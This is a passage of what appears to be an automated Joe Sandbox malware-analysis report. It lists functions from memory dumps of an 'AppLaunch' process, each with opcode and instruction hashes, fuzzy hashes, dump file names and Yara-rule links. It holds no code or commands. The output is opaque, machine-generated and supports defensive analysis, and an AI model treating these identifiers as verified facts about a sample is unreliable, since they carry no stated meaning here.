                                                                                                                                                                                              • Opcode ID: 90d33bd2eb57f53b49b9ce6925c371bea10879c23e4cd5d76eaf20a88c3adada
                                                                                                                                                                                              • Instruction ID: 507b8da54c9350da1d9effd2f258a02513807d0ade45fef710a7d0728eb7c773
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90d33bd2eb57f53b49b9ce6925c371bea10879c23e4cd5d76eaf20a88c3adada
                                                                                                                                                                                              • Instruction Fuzzy Hash: 2721E574E05249EFCB14DFA8D454AEDBBF2EF89354F14802AE805A7350D7349A50CB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 091647F0 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 90b70a28f66e0c17e32196b3da39a0cf782334526abab9d03bd16114444a4452
                                                                                                                                                                                              • Instruction ID: 4496e61331887d1f2517d98bdd364ede80e2be3c55b6aaa5543b1d03a808eb11
                                                                                                                                                                                              • Opcode Fuzzy Hash: 90b70a28f66e0c17e32196b3da39a0cf782334526abab9d03bd16114444a4452
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6721FE74E012299FCB04DFE9D844AEEBBF5BB89305F10862AE815B7390DB745940CFA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C126F Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 12a085dd418975286929b9016e3defb361ffaab9d9b9d64b13719bd941206d4b
                                                                                                                                                                                              • Instruction ID: 020c04100d8f8cc420506c26033d5f9f2a10ee5a65e6997a58f8d7826e524e4b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 12a085dd418975286929b9016e3defb361ffaab9d9b9d64b13719bd941206d4b
                                                                                                                                                                                              • Instruction Fuzzy Hash: A811E63230C3805FD7129B38D854A6D7FE5DF8A270B09419BE845CB2D3EA354C05D766
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0EDC88 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1adf53dae8b38187a435472a3ed0a1ab47ea11a0bbad57799621487f95f3f147
                                                                                                                                                                                              • Instruction ID: 3e5b5e3bf0990e12b357356d0f6bd83dbee9914a75b4a090843a68a815f44b45
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1adf53dae8b38187a435472a3ed0a1ab47ea11a0bbad57799621487f95f3f147
                                                                                                                                                                                              • Instruction Fuzzy Hash: 971121352106499FC714DF69DC4885BBFA7AF843147008D2AE5068B676DE71A909CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574FA90 Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 35267d957d072afdca98bdbdb7d3c6496a5419172ffa974699f60867fb4568fb
                                                                                                                                                                                              • Instruction ID: 92b2e23ced1cf6d01f9de56ee67c0f605e454af0db96df0a7b3d480b23dffc62
                                                                                                                                                                                              • Opcode Fuzzy Hash: 35267d957d072afdca98bdbdb7d3c6496a5419172ffa974699f60867fb4568fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6119D303016519BCB189B34DAA886EBBF7BFC86117D4801AD4068B746CF36EC22CBC1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C4E5F Relevance: .1, Instructions: 61COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 024949d0bd1868e6495ab20b5eb3b6a4449cfc58a73c6a345a23cb8b09b1b9e3
                                                                                                                                                                                              • Instruction ID: 07506afd4bdf624d8a42bc615bcbf08b535a9497b01d03577b155ba1def35aee
                                                                                                                                                                                              • Opcode Fuzzy Hash: 024949d0bd1868e6495ab20b5eb3b6a4449cfc58a73c6a345a23cb8b09b1b9e3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D113425B053805FDB12A738646833E2FA3AFC1315F6C40AED0898B3C7DE288C05D78A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916F220 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 239baab004e343035f15c2ba9587270733b579147acc4189093782f60d7d8b7f
                                                                                                                                                                                              • Instruction ID: ee1d1f9e191da0f20632d59cfb5f7b9f513f14e87a051fc7bdcb9c8871f61186
                                                                                                                                                                                              • Opcode Fuzzy Hash: 239baab004e343035f15c2ba9587270733b579147acc4189093782f60d7d8b7f
                                                                                                                                                                                              • Instruction Fuzzy Hash: E4111476910114AFCF068F98D908ED8BFB6FF0C310F0551AAE604AB232D736D824EB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E1714 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 41d5578387022e4bed2054a686d72677b22c3a01b5878054907fa371d2f3d337
                                                                                                                                                                                              • Instruction ID: 76a3234e5afe017cab9ab3b0b406f0e9b56a4f3b51c99ad12d35fb5c40edbb29
                                                                                                                                                                                              • Opcode Fuzzy Hash: 41d5578387022e4bed2054a686d72677b22c3a01b5878054907fa371d2f3d337
                                                                                                                                                                                              • Instruction Fuzzy Hash: B6117038B001058F8B24DB6DC890D6FBBFAEFC86903548429ED59DB306EB30ED1187A1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 05741AA8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 30a707215de98662784024aafacb56deb485477f9b1583f4662a3c0bc8058eb4
                                                                                                                                                                                              • Instruction ID: 158de1854076226ba8aa6bfb62103d68b7b172ebcd02360f6451b08907dc0bd5
                                                                                                                                                                                              • Opcode Fuzzy Hash: 30a707215de98662784024aafacb56deb485477f9b1583f4662a3c0bc8058eb4
                                                                                                                                                                                              • Instruction Fuzzy Hash: 812109B4E042499FCB40DFA9C581AAEBFF1FF49310F2081AAD818A7751D7309A41DFA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916ED88 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: b01e9196956a1f6c6deb199b83551a832c8cf26850d8a031345333cc14caebd2
                                                                                                                                                                                              • Instruction ID: 8110d2dd001de763d249bffc997108c74f7c5cd522be5073798f0a4b0b3fef99
                                                                                                                                                                                              • Opcode Fuzzy Hash: b01e9196956a1f6c6deb199b83551a832c8cf26850d8a031345333cc14caebd2
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B113474E0121A8FCB08EFA5D4586EEBBB2FF89311F10452AD405B7380CB766A55CFA4
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916BE60 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ad6c79276d190a7b0a058b00c73b6f1b7819a740812e158a2fe5ad61b650094b
                                                                                                                                                                                              • Instruction ID: c74a69971a455fc78aa82045d9e12cf9930c47871ce31bf29ec8fbde7fe7b277
                                                                                                                                                                                              • Opcode Fuzzy Hash: ad6c79276d190a7b0a058b00c73b6f1b7819a740812e158a2fe5ad61b650094b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6B11E775E0470A8ECB50EFA9D9804DEFBB4FF48314B10966AE559F3211E730A595CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0541D14B Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.407181978.000000000541D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0541D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_541d000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 57579a75ee6befb3812fde9df4a5292aa026fa4f580f003769344605979a8ca1
                                                                                                                                                                                              • Instruction ID: ea57642b7cb0bd48beb193c0c44003bfb53aedca21c424a69d5b0a83a6515a76
                                                                                                                                                                                              • Opcode Fuzzy Hash: 57579a75ee6befb3812fde9df4a5292aa026fa4f580f003769344605979a8ca1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 862190B6504280DFCF06CF54D9C4B56BF72FB88314F2886AADD480E656C33AD456CB92
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E0E63 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 564b5422a3e069dd1e64c6b8a27eeb97854339e9bc91bb1800982523efcb5238
                                                                                                                                                                                              • Instruction ID: dcf76d7982e5a18e3961d0ba66f5616bb10b365ea55ea53fe7f8b7046a97a725
                                                                                                                                                                                              • Opcode Fuzzy Hash: 564b5422a3e069dd1e64c6b8a27eeb97854339e9bc91bb1800982523efcb5238
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1611C2357052458FCB29AB38D05062DBBE3EFC8351B5880AED849DB387DA35EC12C781
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0574FF20 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.408354716.0000000005740000.00000040.00000800.00020000.00000000.sdmp, Offset: 05740000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_5740000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: cc0d2676c45c5a981b06de749f30bccea7da640afbf6c12cc32689eb43671da4
                                                                                                                                                                                              • Instruction ID: 44a9459e45bfb98cf4cb63ba0c864c9c402872e5d6bcaccaf009c9cebb77a88e
                                                                                                                                                                                              • Opcode Fuzzy Hash: cc0d2676c45c5a981b06de749f30bccea7da640afbf6c12cc32689eb43671da4
                                                                                                                                                                                              • Instruction Fuzzy Hash: A0118E3120E3D14FD3276B3898215D63F729F93310B0A44EBD095CFAA3DA29884AD766
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916F500 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e96104764799852fc08bf8d1d1c398a58e8a18077b8e02a1d0c3139e10398519
                                                                                                                                                                                              • Instruction ID: 3832a6d24e44a7a68d31a21bb71b5d64fce827364cec795a9397c0f9d0223a80
                                                                                                                                                                                              • Opcode Fuzzy Hash: e96104764799852fc08bf8d1d1c398a58e8a18077b8e02a1d0c3139e10398519
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E113A75B007058FC734CF6DE98085AB7F6AF882143248B5AE456C7766EB31ED06CB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0ED6C8 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: d07d2b08dc519ba684a655201d516dbee3ef68d61a4e5f40e96e3d180ca9ed6e
                                                                                                                                                                                              • Instruction ID: d63266d830bb7a1d266cef84fded6c1568e860e6897b0c95b7f03934452ca1ff
                                                                                                                                                                                              • Opcode Fuzzy Hash: d07d2b08dc519ba684a655201d516dbee3ef68d61a4e5f40e96e3d180ca9ed6e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 10113D3520064A9FCB10DF2CD84489E7FA6FF84310700891AE5598B235DB71BD15CBD0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E3080 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 385e19d177ffb65a77628acdb2690a72ad380b182abac8302761286636836e69
                                                                                                                                                                                              • Instruction ID: 392e611e96c8cbfdf5b158799c8e9d78d6cae8a15bb16d63b114a2e1646dbb03
                                                                                                                                                                                              • Opcode Fuzzy Hash: 385e19d177ffb65a77628acdb2690a72ad380b182abac8302761286636836e69
                                                                                                                                                                                              • Instruction Fuzzy Hash: 06213035D0430ACFCB04EFA8D8449BEBBF1FF44310B108559D455AB2A6EB34A952CB80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0E30EE Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422573115.000000000F0E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0E0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0e0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 1d945318a6b8891c64a8ad7c12531d6d786b6e6eca3d508487236064b2b8b484
                                                                                                                                                                                              • Instruction ID: da8a9bec86fd5285e2d7c512b8caf3a9adc58e4cbd23e069e7136802c227419f
                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d945318a6b8891c64a8ad7c12531d6d786b6e6eca3d508487236064b2b8b484
                                                                                                                                                                                              • Instruction Fuzzy Hash: 78114F34B002088FCB14EFA8D854BEDBBB2EF88320F10855DE515BB291DF35A851CB51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 091688F4 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 291ca4a6b8b5ad3541a699c2780cc5ad36bcec859fbd1defa10306bbdefd5f4f
                                                                                                                                                                                              • Instruction ID: cd7795130ac5d8404047be213f8357a4395cc3a5ab3735502068205cabbc38c8
                                                                                                                                                                                              • Opcode Fuzzy Hash: 291ca4a6b8b5ad3541a699c2780cc5ad36bcec859fbd1defa10306bbdefd5f4f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 242133B5D002099FCB60CF9AC984ADEBBF8FB58324F108469E919B7210C374A954CFA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 09168B38 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 14ffbb7fa4a15881520d63e1c4f261e6ba5a62fa96a96c9eb3dbacb7ee6cea4e
                                                                                                                                                                                              • Instruction ID: 2869e7909d27e2b4a215e0d79f05398cb25c6053a2bb4d89bb017fbb1a1a24b2
                                                                                                                                                                                              • Opcode Fuzzy Hash: 14ffbb7fa4a15881520d63e1c4f261e6ba5a62fa96a96c9eb3dbacb7ee6cea4e
                                                                                                                                                                                              • Instruction Fuzzy Hash: C12147B9D002499FCB10CF9AC884ADEBFF4FB48314F148419E959A7310C375A955CFA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916D208 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 98dc1adcb3e32b0e801b97f3714f23572901709282607263b34d94f8024126c5
                                                                                                                                                                                              • Instruction ID: 84771588a3cd7ed9dde7fed602ba0613b7015b8bdcc4d6a516c95e14d18c647a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 98dc1adcb3e32b0e801b97f3714f23572901709282607263b34d94f8024126c5
                                                                                                                                                                                              • Instruction Fuzzy Hash: C4211738F0030ACFDB24DFA0D594B9EB7B1AF49304F219459E809AB354DB70AA85CF51
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0916F510 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.417687038.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_9160000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 01b95526d414da9a110f84e980c0467d307ed8916d4819fdb4ba1f346d83052c
                                                                                                                                                                                              • Instruction ID: 043170f42dc5ff3f00382678990ba8a7f31a8a9a77a9b4628bc79be90e879a42
                                                                                                                                                                                              • Opcode Fuzzy Hash: 01b95526d414da9a110f84e980c0467d307ed8916d4819fdb4ba1f346d83052c
                                                                                                                                                                                              • Instruction Fuzzy Hash: EC11DD75B006058FC334DE6DE984857B7FAEF882143148B69E456C7765EB31FC068BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0541D73B Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.407181978.000000000541D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0541D000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_541d000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                                                                              • Instruction ID: 4e945519919ec1bcef2a3d4d5aecf556c4b838c9ea5766b5d1e759f9a1712706
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e78fb41457c0dbc2d9524af8796639b843feda46be7989836c0fd150c2e2370
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6511B4B6904280CFCB16CF14D9C4B56BF72FB84324F28C6AADC454B656C336D45ACB91
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C454F Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: e5039a73a3bacb4f59c5b342fb59cfc4e262be1fd4f79bdfea38623741cd03f7
                                                                                                                                                                                              • Instruction ID: cb73f16fb32651eff9637f110dd31ff14a32911a55def7b37225698b24e7fdc3
                                                                                                                                                                                              • Opcode Fuzzy Hash: e5039a73a3bacb4f59c5b342fb59cfc4e262be1fd4f79bdfea38623741cd03f7
                                                                                                                                                                                              • Instruction Fuzzy Hash: E8116D35204302CFDB16CF24E444A99BBB5FF86361B44C1ADE855CF252D73AE841DB90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0F0C3467 Relevance: .1, Instructions: 56COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000002.00000002.422391041.000000000F0C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0F0C0000, based on PE: false
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_f0c0000_AppLaunch.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
